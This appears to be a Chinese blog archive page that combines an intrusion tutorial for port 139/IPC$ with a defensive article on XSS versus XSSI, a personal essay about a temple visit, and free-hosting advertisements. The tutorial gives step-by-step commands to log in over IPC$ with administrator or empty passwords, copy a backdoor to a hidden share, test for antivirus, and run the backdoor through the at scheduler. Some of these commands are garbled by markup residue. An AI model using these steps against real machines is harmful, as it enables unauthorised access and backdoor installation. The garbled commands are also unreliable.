总是需要一些温暖。哪怕是一点点自以为是的纪念。 注册 | 登陆
浏览模式: 标准 | 列表2016年11月的文章

139入侵简易教程

  net use\192.168.0.1ipc$Content$nbsp;"" /user:administrator  提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。  首先,连接的命令是:  net<空格>use<空格>\IP地

  net use\\192.168.0.1\ipc$Content$nbsp;"" /user:administrator

  提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。

  首先,连接的命令是:

  net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名

  假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:

  netuse \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!

  空密码是这样的:

  如果密码是空的,那就在原先输入密码的地方以""代替。

  开始查看权限:

  查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:

  copy<>文件绝对路径<>\\IP地址\文件目标路径

  比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:

  copy c:\a.exe \\192.168.1.11\d$Content$nbsp;

  要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"

  小技巧:

  再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!

  如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。

  查看目标系统时间,准备使用at任务计划运行程序。

  命令格式:

  net<空格>time<空格>\\IP地址

  例子:

  net time\\192.168.1.11

  系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!

  使用AT命令为目标系统添加任务计划:

  格式:

  at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名

  例子:

  at \\192.168.1.1118:20 d:\a.exe

  IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。

  所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。

浅析XSS与XSSI异同

这篇文章主要介绍了XSS与XSSI异同,跨站脚本(XSS)和跨站脚本包含(XSSI)之间的区别是什么?防御方法有什么不同?感兴趣的小伙伴们可以参考一下

Michael Cobb:自上世纪90年代,攻击者就已经开始利用XSS漏洞,并且,最主要的网站(例如谷歌、雅虎和Facebook)都在一定程度上受到过XSS漏洞的影响。与大多数应用层攻击(例如SQL注入),基于XSS的攻击会攻击应用的用户,而不是应用或服务器。这些攻击的工作原理是注入代码(通常例如JavaScript客户端脚本)到Web应用的输出。大部分网站有很多注入点,包括搜索域、cookies和表格。虽然这些恶意脚本不能直接感染服务器端信息,它们仍然可以破坏网站的安全性。通过使用Document Object Model操作来更改表格值,改变网页的外观或切换表格操作以张贴提交的数据到攻击者的网站,攻击者可以窃取数据、控制用户的会话、运行恶意代码或用作网络钓鱼欺诈的一部分。

XSSI是XSS的一种形式,它利用了这样一个事实,即浏览器不会阻止网页加载图像和文字等资源,这些资源通常托管在其他域和服务器。例如,脚本可能提供攻击者需要的功能,帮助创建特定的页面—很多网站包含托管在https://developers.google.com/speed/libraries/#jquery的JavaScript库jQuery。然而,这种包含可能被利用来从一个域名读取用户数据—当用户正在访问另一个域名时。例如,如果ABC银行有一个脚本用于读取用户的私人账户信息,攻击者可以在其自己的恶意网站包含这个脚本,当ABC银行的客户访问攻击者的网站时,攻击者就可以从ABC银行的服务器提取用户信息。

开发者可以部署多种措施来抵御XSSI攻击。其中一种方法是向用户提供独特的不可预测的授权令牌,在服务器响应任何请求之前,需要发送回该令牌作为额外的HTTP参数。脚本应该只能响应POST请求,这可以防止授权令牌作为GET请求中的URL参数被暴露,同时,这可以防止脚本通过脚本标签被加载。浏览器可能会重新发出GET请求,这可能会导致一个操作会执行一次以上,而重新发出的POST请求需要用户的同意。

在处理JSON请求时,在响应中增加非可执行前缀,例如“\n”,以确保脚本不可执行。在相同域名运行的脚本可以读取响应内容以及删除前缀,但在其他域名运行的脚本则不能。此外,开发者还应该避免使用JSONP(具有填充功能的JSON)来从不同域名加载机密数据,因为这会允许钓鱼网站收集数据。同时,发送响应表头“X-Content-Type-Options: nosniff”也将帮助保护IE和谷歌Chrome用户免受XSSI攻击。

为了应对XSS攻击,可在HTTP Content-Type响应表头或者HTML代码中meta标签中http-equiv属性中指定CHARSET,让浏览器不会解译其他字符集的特殊字符编码。对于使用ASP.NET开发网站的开发者,微软Anti-Cross Site Scripting Library可以帮助保护Web应用抵御跨站脚本漏洞。

现在有很多开源漏洞扫描工具可供开发者使用,以测试其代码是否容易遭受XSS攻击,例如Vega、Wapiti、OWASP的Zed Attack Proxy和Skipfish。企业应该定期对网站进行扫描,同时,在底层代码变更或依靠第三方库的功能集成到各种网页时,也应该扫描网站。

读完此文,大家应该知道两者的区别在哪了。

去一趟佛门古刹

  

  今天的心情带着疲惫,准备去往佛门古刹,听村里的老人说过,拜佛的人会长寿,下跪的人会有福。

来到山下,一个人的清风刺透心田,感觉人世间的唯美,山间的秀丽,万般的风华绝代,如果可以形容,我的词就是琼楼富贵,玉宇繁华。

大门之上空空的写着两个字,古刹。

想起自己的曾经,十八年的累积,才换来两个酸甜的字,叫做看不见的青春。

石板是一节接一节,如同年华一年连着每一天,不错过,也不留下的脚印了无痕,人海茫茫,繁华过却,才了解后面的风景是给自己听的。

进了古刹,看了人群,有卖的,有买的,来回路上还有旅客,想想一辈子,想想每一天,丢失的时间一串串,利用的年纪没多少。

风景,一个透明而且没有含义的错过,辞藻,一段风生水起的格局,多少人来烧香,多少人来求佛,有人希望别人开心才来这里,有人希望自己富贵,才来这里,有人不求高贵,就有人不求贫寒,脆弱的灵魂依然是那么的简短,刻骨的心灵含蓄而荡然无存。

来到阎罗殿,看到无常鬼,看到阎罗的黑,原来传说的可怕是很少人来的地方,很少人烧香,也许是阎罗没有什么可以保佑的,无常只有索取的。

此时我的背后有人指指点点,就有人开怀大笑,也许对我不理解,也许对我很纳闷,阎罗殿有什么好的,一不参拜,二不烧香,才是对的。

可能吧,毕竟是阎罗殿,这个古刹真奇妙,佛的境地,有阎罗的殿门,虽然说是一种安康,可是总有人担心才不敢进入求拜。

回首往年,人死的时候,总有那么一群人伤感,人出生的时候,总有那么一群人微笑,对我来说,活着是一种秩序,有人用开心来表达自己的希望,也有人用沉默来代替自己的奋斗,不怕什么失败,不怕什么输赢,只在乎那个传说的一个未来。

走了走,停了听,看到小桥旁,流水不止,盘龙吐水,秀丽而有美感的鱼儿游来游去,有一种恍若神离的感觉,有一种缥缈仙境的腾云驾雾。

仔细看,想起一个词,叫做鲤鱼跃龙门,这个是传说的故事,真的没见过神仙,也无法洞悉人间的真理,神龙,如果生命可以选择,估计很多人会选择做一条鱼,等待那所谓的鲤鱼跃龙门的传说去敷衍自己的内心,也是值得奋斗的一辈子。

有人来到这里就开怀大笑,直接说出了鲤鱼越龙门,旁边的一个人却说道,商人重利轻离别,也是一种鲤鱼越龙门啊。

瞬间打开了我人生的智慧之门,对啊,句子是死的,人是活的,只要驾驭好自己的奋斗,一定可以像传说的鲤鱼越龙门那样神奇啊。

那人苍茫而去,我却寻思良久,这道风景的学习,不是为了别的,原来得知的是一个人的固定,如果太过死板,一辈子都不会赶上鲤鱼越龙门。

步履仓促,一个人徘徊了人群,来到一座殿宇,好大的一尊佛,传说他的一句话,五百年的擦肩而过换来今生的回眸。

双手合并,禅悟一次,然后转身,看到的人群似乎都来聚集。

不知道多少人来回都参拜了这座佛,也不知道他保佑了多少人,更不知道我的一拜,是未来的凶多吉少,还是吉多凶少。

侧耳听去,一个佛门弟子说道,来的都是佛,去的都是佛,佛是人,神是人,人是神佛,神佛是人。

缘来花去的缘就是别人的说,一个人可以等待一个说,一个佛也可以等待一个故事的编写。

当我们回首经年,路过别人心中的佛,还是走进自己心中的神,未必拿到一分钱,未必被骗一份缘。

当生命擦过一辈子的苦难,当岁月带走一辈子的微笑,我们依然锁住的是灵魂,困住的是心灵,回首往昔,发现自己是那么的缺少佛缘。

当准备离开的时候,测眼看去,有一种离不开的感觉,写着那么四个大字,玉皇大帝。

我走了进去,有抽签的,有解签的,这是算卦吗?还是一种计算命运的格局,有人解签后苦闷,也有人抽签后微笑不一。

离开殿宇的人都有了一种回家的感觉,我往前一走,人群勇力的抽签,我抽了一只,不知是什么签,刚准备离开,直接把那根签丢到了桌面上。

然后走开,走了十几步,有人喊道谁抽到了天下第一签,不知为什么,这种感觉似乎很神奇。

那个解签的人大声喊道,谁抽到了天下第一签,可以免费赠送佛门三宝。

可是依然在没人承认的情况下,我离开了,就这样在这种丰韵犹存的感觉下,我依然感觉古刹是一种静心的感觉,一种命运平静的沉默。

来到了一片池塘,它的秀丽,它旁边的树木,人群,有钓鱼的,有看风景的,还有那触目静心的情侣在那开玩笑。

此时钟声敲响了,原来是那传说的第一钟,是有人抽到了天下第一签,对,很多人的说话,是的,天下第一签。

此时我想起一句话,姜子牙钓鱼,愿者上钩,多么经典的话语,想起一句连接,如果加上那句鲤鱼越龙门,哦,不,这样的句子太伤感了,毕竟是姜子牙要等到八十一岁才越过龙门,这样的感慨让我伤心难忘。

不过如果我是姜子牙,那么等到八十岁也是值得的,毕竟前提是自己有一身的谋略,俗人说的好,胸中谋略,腹中才华。

这八个字写的容易,可是获得别人口中的称赞,很多人的希望,祝福,却要付出很多年,很多年。

上天没有给任何人机会,很多人得到的金钱,才华,富贵,也许都是经过努力才获取的,对一个初生牛犊来说,如果想一口吃个大胖子,那是一个梦,也是一个传说,只有用时间和才华的阅读,去探索生命的真谛,才能找到那属于自己的鲤鱼越龙门。

交至的纵横线,一直徘徊出发的起点,当回首的感觉,自己是佛,还是那传说的姜子牙,或者成为别人说说的神,有一种不敢付出的感觉,有一种不敢接受那所谓的八十一岁鲤鱼越龙门的梦想,似乎神仙道,似乎电影里的传说,也不知道有没有传说的龙,姜子牙。

当我发现命和梦想只有一步之遥,很多人是走不进去的,虽然有腿,可以没有那份敢接受的心,没有那份值得付出的理由。

抓住自己的心很难,抓住那颗敢以奋斗的明天去追逐的灵魂的心更难,不知何时写过那么一句话,失败是别人的,那么成功就是我自己的。

十指合并,念一声佛,赌一个姜子牙,还是梦一个鲤鱼跃龙门,这都只能在电视里看到,也能在人群里描述,只是一个换写词而已。


200M免费全能空间,速度不错,支持绑米,FTP管理

24小时网络为您提供200M免费全能空间,速度不错,支持绑米,FTP管理,论坛申请,有条件的。24小时网络免费空间-B型介绍:总空间容量 250 MB 
WEB空间 200 MB 
LOG空间 50MB 
IIS并发连接数 100个 
网络流量 2GB/月 
数据库 免费支持Access数据库 
支持语言 Win .net1.1 HTML、ASP、ASP.NET1.1、CGI、Perl、PHP 
Win .net2.0 HTML、ASP、ASP.NET2.0、CGI、Perl、PHP 
服务器放置地点 国内 
域名  
捆绑企业邮局  查看邮局配置信息 
主机支持 
脚本程序支持VBS/JS  
JMail组件  
Shockware/Flash支持  
程序读写文件权限  
BBS论坛支持  
在线发信程序  
主机管理 
域名绑定  
WEB FTP  
用户信息  
密码修改
演示地址:http://freewl.24hourwl.cnASP探针:http://freewl.24hourwl.cn/asp.aspPHP探针:http://freewl.24hourwl.cn/php.phpNET探针:http://freewl.24hourwl.cn/aspx.aspx详细请见:http://www.24hourwl.cn/showtopic-293.aspx

神网互连提供200M免费全能空间申请

神网互连提供200M免费全能空间申请[1] 独立网页空间200M,FTP帐号一个,IIS10个;
[2] 免费全能空间支持在线压缩/解压缩功能
[3] 独立控制面板,各项管理功能均可直接在线操作,包括:修改FTP密码、最多绑定2个域名、设定网站缺省首页、自定义404错误页面等,
[4] 程序支持:HTM/HTML/ASP/PHP/ASP.NET
[5] 脚本支持:VBS/JS
[6] 组件支持:文件读写FSO支持,邮件发送cdonts、Jmail支持
[7] 数据库: 赠送20MBMYSQL数据库
[8] 数据备份:每周本地,第三方服务器双重备份申请地址:http://haogod.com/pdtshw/hstshw/index.asp?pcid=12 

100M免费全能空间 支持HTML、ASP、PHP、ASP.NET等网页脚本

神胜网络为您提供100M免费全能空间,本空间是限量开设,要的朋友要快点,迟了是就没有了.具体请看下面的说明.> 限量开通100个,需要审核开通.
> 支持HTML、ASP、PHP、ASP.NET等网页脚本
> 支持动易2006、2005、支持绑定子目录、在线解压
> 无CPU限制、流量限制、IIS限制
> 100MB 独立网页空间,
> 5 MySQL
> 虚拟主机Web控制面板,
> 电信机房空间.
> 数据定期备份,负载均衡系统
> 24×7的在线技术支持
> 禁止上传违法等站点
> 上传论坛需要及时备案
> 否则将被关闭,并不退还款项!演示地址:http://freewl.jxsskj.comASP探针:http://freewl.jxsskj.com/asp.aspPHP探针:http://freewl.jxsskj.com/php.phpNET探针:http://freewl.jxsskj.com/aspx.aspx申请地址:http://jxsskj.com/ProductShow.aspx?PSign=HT00001

嘉英网免费50M~1G全能双线空间 Access数据库免费

嘉英网免费50M~1G全能双线空间介绍:免费空间大小:50M~1G免费空间功能:FTP管理+ASP+PHP+ASP.NET1.1+.NET2.0+FSO组件+Access数据库+MYSQL数据库+MSSQL数据库+各类组件DZ论坛演示:http://www.16xx.netIIS连接数:100~1000网络流量:不限制CPU资源分配:3%安全性:病毒防火墙系统 支持并实时在线升级 金盾8G抗DDOS硬防数据库:Access数据库免费(跟web空间共享数据库大小)MYSQL数据库50M(可升级)  MSSQL数据库50M(可升级)

365IIS为提供1.2G免费全能空间申请,超大免费空间,注册即可开通。

365IIS为提供1.2G免费全能空间申请,超大免费空间,注册即可开通。免费空间完全支持ASP、PHP、ACCESS、MYSQL、FTP
支持顶级域名绑定
支持手机WAP建站
支持论坛、FLASH播放
支持ZIP、RAR下载
流量不限
速度快,无广告
可谓目前国内功能最全最好的免费空间免费网络演示地址:http://freewl.free1.zzziis.com/
免费网络ASP探针:http://freewl.free1.zzziis.com/asp.asp
免费网络PHP探针:http://freewl.free1.zzziis.com/php.php
1.2G免费全能空间申请地址:http://www.365iis.com
Records:69123456789